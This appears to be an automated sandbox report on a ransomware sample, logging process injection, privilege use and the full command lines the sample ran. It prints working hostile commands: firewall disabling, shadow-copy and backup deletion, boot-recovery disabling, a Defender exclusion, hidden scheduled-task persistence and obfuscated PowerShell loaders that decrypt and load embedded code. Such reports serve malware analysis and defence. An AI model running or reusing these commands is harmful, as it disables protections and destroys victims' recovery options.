N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3C2E.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3C2E.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 4716 wrote to memory of 1856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 4716 wrote to memory of 1856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 4716 wrote to memory of 1856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 4716 wrote to memory of 3420 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\s777mx.exe
PID 4716 wrote to memory of 3420 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\s777mx.exe
PID 4716 wrote to memory of 3420 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\s777mx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 3292 wrote to memory of 2992 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C2E.exe
PID 3292 wrote to memory of 2992 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C2E.exe
PID 3292 wrote to memory of 3280 N/A N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe
PID 3292 wrote to memory of 3280 N/A N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe
PID 3292 wrote to memory of 3280 N/A N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe
PID 3292 wrote to memory of 4152 N/A N/A C:\Users\Admin\AppData\Local\Temp\42D7.exe
PID 3292 wrote to memory of 4152 N/A N/A C:\Users\Admin\AppData\Local\Temp\42D7.exe
PID 3292 wrote to memory of 4152 N/A N/A C:\Users\Admin\AppData\Local\Temp\42D7.exe
PID 3292 wrote to memory of 1424 N/A N/A C:\Users\Admin\AppData\Local\Temp\547C.exe
PID 3292 wrote to memory of 1424 N/A N/A C:\Users\Admin\AppData\Local\Temp\547C.exe
PID 3292 wrote to memory of 1424 N/A N/A C:\Users\Admin\AppData\Local\Temp\547C.exe
PID 3292 wrote to memory of 4248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3280 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe C:\Windows\system32\cmd.exe
PID 3280 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe C:\Windows\system32\cmd.exe
PID 3280 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe C:\Windows\system32\cmd.exe
PID 3280 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 1644 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 1644 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 1644 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 4256 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4256 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4256 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4256 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4940 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4940 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4940 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4940 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 4980 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4980 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4988 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4988 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3292 wrote to memory of 4500 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4500 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4500 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4500 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 544 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 544 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 544 N/A N/A C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

"C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe"

C:\Users\Admin\AppData\Local\Temp\s777mx.exe

"C:\Users\Admin\AppData\Local\Temp\s777mx.exe"

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

"C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe"

C:\Users\Admin\AppData\Local\Temp\3C2E.exe

C:\Users\Admin\AppData\Local\Temp\3C2E.exe

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

C:\Users\Admin\AppData\Local\Temp\42D7.exe

C:\Users\Admin\AppData\Local\Temp\42D7.exe

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

"C:\Users\Admin\AppData\Local\Temp\3EBF.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 556 -ip 556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 216

C:\Users\Admin\AppData\Local\Temp\547C.exe

C:\Users\Admin\AppData\Local\Temp\547C.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\547C.exe

"C:\Users\Admin\AppData\Local\Temp\547C.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4152 -ip 4152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4112);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2024);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')

C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe

C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TbvDl' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TbvDl.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TYjHE' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TYjHE.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.103.197.20.in-addr.arpa udp
US 8.8.8.8:53 42.220.44.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 177.17.30.184.in-addr.arpa udp
